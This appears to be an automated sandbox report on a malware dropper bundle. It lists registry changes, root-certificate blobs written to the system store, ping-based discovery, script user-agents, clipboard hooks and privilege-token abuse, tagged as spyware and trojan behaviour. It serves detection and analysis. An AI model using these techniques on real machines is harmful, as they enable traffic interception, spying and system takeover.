Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ZCMT625E-AH9A-L1YJ-Y7VX-PCGSG910PJ27}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LCIQ760R-GE9F-A0CR-W6HI-XMJGK341RE71}	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\650478DC7424C37C	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IIRT641V-ST1Y-V6LD-W3TL-UIUSI353MX63}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000059b8c2f5b919e100a3318015f235a461e944641bfdc30f1fce42fa1e52d263e5c0ffdb4a82e3c48e5bf4c54a9b8d1d91ba5c39d7301c53d984594db4bf2c372d5d10dc5e4a525888e5c7d0d33ac3bd27f1497e1be2e6a4c12cb6	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu214ce31cede21.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Thu214ce31cede21.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
2668	PING.EXE
5376	PING.EXE
7876	PING.EXE
5200	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	187	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	46	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	70	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	119	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	123	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	120	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	39	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	51	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	85	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
4484	Thu2164f292a11ce.exe
4484	Thu2164f292a11ce.exe
3752	powershell.exe
2172	Explorer.EXE
2172	Explorer.EXE
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
744	rundll32.exe
744	rundll32.exe
2172	Explorer.EXE
2172	Explorer.EXE
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe
4296	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2172	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4484	Thu2164f292a11ce.exe
6308	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

pid	Process
5900	7572993.exe
6908	6479669.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeAssignPrimaryTokenPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeLockMemoryPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeIncreaseQuotaPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeMachineAccountPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeTcbPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeSecurityPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeTakeOwnershipPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeLoadDriverPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeSystemProfilePrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeSystemtimePrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeProfSingleProcessPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeIncBasePriorityPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeCreatePagefilePrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeCreatePermanentPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeBackupPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeRestorePrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeShutdownPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeDebugPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeAuditPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeSystemEnvironmentPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeChangeNotifyPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeRemoteShutdownPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeUndockPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeSyncAgentPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeEnableDelegationPrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeManageVolumePrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeImpersonatePrivilege	4056	Thu21a1ef054cac78a.exe
Token: SeCreateGlobalPrivilege	4056	Thu21a1ef054cac78a.exe
Token: 31	4056	Thu21a1ef054cac78a.exe
Token: 32	4056	Thu21a1ef054cac78a.exe
Token: 33	4056	Thu21a1ef054cac78a.exe
Token: 34	4056	Thu21a1ef054cac78a.exe
Token: 35	4056	Thu21a1ef054cac78a.exe
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	848	Thu21568b0ab8.exe
Token: SeDebugPrivilege	3944	Thu219d5fe8cf316.exe
Token: SeDebugPrivilege	4616	Thu2156de5489c19.exe
Token: SeDebugPrivilege	1988	8532126.exe
Token: SeRestorePrivilege	2276	WerFault.exe
Token: SeBackupPrivilege	2276	WerFault.exe
Token: SeDebugPrivilege	4924	2.exe
Token: SeDebugPrivilege	2276	WerFault.exe
Token: SeDebugPrivilege	1408	4999760.exe
Token: SeDebugPrivilege	4432	DVORAK.exe
Token: SeShutdownPrivilege	2172	Explorer.EXE
Token: SeCreatePagefilePrivilege	2172	Explorer.EXE
Token: SeDebugPrivilege	2876	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	2172	Explorer.EXE
Token: SeCreatePagefilePrivilege	2172	Explorer.EXE
Token: SeShutdownPrivilege	2172	Explorer.EXE
Token: SeCreatePagefilePrivilege	2172	Explorer.EXE
Token: SeDebugPrivilege	744	rundll32.exe
Token: SeDebugPrivilege	4296	WerFault.exe
Token: SeShutdownPrivilege	2172	Explorer.EXE
Token: SeCreatePagefilePrivilege	2172	Explorer.EXE
Token: SeShutdownPrivilege	2172	Explorer.EXE
Token: SeCreatePagefilePrivilege	2172	Explorer.EXE
Token: SeDebugPrivilege	744	rundll32.exe
Token: SeDebugPrivilege	2572	svchost.exe
Token: SeDebugPrivilege	4816	46807GHF____.exe
Token: SeShutdownPrivilege	2172	Explorer.EXE
Token: SeCreatePagefilePrivilege	2172	Explorer.EXE
Token: SeShutdownPrivilege	2172	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1000	Thu21b93295136197.tmp
5628	setup_2.tmp
2172	Explorer.EXE
2172	Explorer.EXE
6404	stats.tmp
6852	ultramediaburner.tmp
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
2172	Explorer.EXE
4868	Conhost.exe
2172	Explorer.EXE
2172	Explorer.EXE
4868	Conhost.exe
4868	Conhost.exe
2172	Explorer.EXE
2172	Explorer.EXE
4992	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
4992	Adorarti.exe.com
4992	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
4344	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
4344	Adorarti.exe.com
4344	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7300	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7300	Adorarti.exe.com
7300	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7716	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7716	Adorarti.exe.com
7716	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7928	installer.exe
7200	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7200	Adorarti.exe.com
7200	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7696	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7696	Adorarti.exe.com
7696	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7544	Adorarti.exe.com
2172	Explorer.EXE
2172	Explorer.EXE
7544	Adorarti.exe.com

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
4868	Conhost.exe
4868	Conhost.exe
4868	Conhost.exe
4992	Adorarti.exe.com
4992	Adorarti.exe.com
4992	Adorarti.exe.com
4344	Adorarti.exe.com
4344	Adorarti.exe.com
4344	Adorarti.exe.com
7300	Adorarti.exe.com
7300	Adorarti.exe.com
7300	Adorarti.exe.com
7716	Adorarti.exe.com
7716	Adorarti.exe.com
7716	Adorarti.exe.com
7200	Adorarti.exe.com
7200	Adorarti.exe.com
7200	Adorarti.exe.com
7696	Adorarti.exe.com
7696	Adorarti.exe.com
7696	Adorarti.exe.com
